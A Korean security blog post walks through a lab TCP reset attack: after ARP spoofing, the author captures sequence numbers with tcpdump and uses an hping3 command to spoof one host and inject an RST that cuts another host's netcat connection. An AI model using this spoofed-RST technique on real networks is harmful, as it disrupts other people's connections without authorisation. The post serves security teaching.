TCP 통신 기반 DoS 공격 실습

2022. 7. 8. 17:37·보안/인프라

뭔소리냐면

A(10.200.181.5) 와 B(10.200.181.6, nc서버)이 서로 nc으로 통신하고 있음.

그 사이 kali가 껴서 A를 끊어버릴 것이다. 어떻게 해야 할까?

 

 

1. ARP 스푸핑

이전 게시글에서 했었다.

자세한 설명은 생략한다.

 

2. 칼리에서 tcpdump를 켠다

tcpdump -S -n port 4000

 

 

3. B에서 nc 통해 포트를 오픈한다. 그리고 A가 연결해서 몇마디 나눠보셈

 

4. tcpdump 확인.

 

 

5. 나는 10.200.181.5의 연결을 끊을 것이다.

hping3 -s 4000 -a 10.200.181.6 -p 60378 -M 2680635114 -L 0 -R -c 1 10.200.181.5

 

[-s]: 출발지 port

[-p]: 목적지 포트

[-a]: 스푸핑할 ip

[-M]: sequence number

[-L]: ACK number. RST 날릴거라 이거 필요없음

[-R]: RST 플래그

[-c]: 보낼 패킷 수

 

10.200.181.6이 10.200.181.5에게 RST 날린 것처럼 유도하는 것임.

여기서 sequence number는 10.200.181.5가 10.200.181.6으로 보낸 가장 최신 패킷의 ack number를 써주면 된다.

 

 

결과

kali
centOS 6.9 (10.200.181.5)

10.200.181.5가 억울하게 연결이 끊긴 것이 보이는가?

그럼 성공했다.

저작자표시 (새창열림)

'보안 > 인프라' 카테고리의 다른 글

UTM Oversubscription  (0) 2022.07.31
네트워크 보안 제품 구성 모드 (In-line, Mirroring, Proxy)  (0) 2022.07.30
Slow-Rate: Slowloris 공격 실습  (1) 2022.07.08
Slow-Rate: TorsHammer 공격 실습  (0) 2022.07.08
PPS based Flooding (TCP Flag)  (0) 2022.07.08
'보안/인프라' 카테고리의 다른 글
  • UTM Oversubscription
  • 네트워크 보안 제품 구성 모드 (In-line, Mirroring, Proxy)
  • Slow-Rate: Slowloris 공격 실습
  • Slow-Rate: TorsHammer 공격 실습
병뚜
병뚜
열정!
  • 병뚜
    열려라 뚜껑
    병뚜
  • 전체
    오늘
    어제
    • all (372)
      • 일상X사랑X돈 (0)
        • 보안이슈 (114)
        • 뜨거운감자 (9)
        • 맛집 (2)
        • 혼잣말 (16)
      • 보안 (87)
        • 웹·모바일 (46)
        • 인프라 (19)
        • 리버싱 (8)
        • Security-Gym (10)
        • 리뷰 (4)
      • 프로그래밍 (66)
        • python (14)
        • java (12)
        • js (40)
      • System (47)
        • OS (14)
        • 침투 (33)
      • Play (20)
        • wargame (20)
      • 기타 (10)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    IT뉴스
    정보보안교육
    커널디버깅
    뉴스요약
    jwt
    혼공학습단
    드림핵리버싱
    프로세스
    보안뉴스
    파이썬
    리버싱초보
    자바스크립트 상속
    파이썬초보
    보안이슈
    혼자공부하는파이썬
    악성코드
    it이슈
    windows internals
    공급망공격
    정보보안
    정보보호
    윈도우인터널스
    랜섬웨어
    혼공단
    kisa
    파이썬입문
    혼공파
    혼공
    파이썬공부
    리버싱
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
병뚜
TCP 통신 기반 DoS 공격 실습
상단으로

티스토리툴바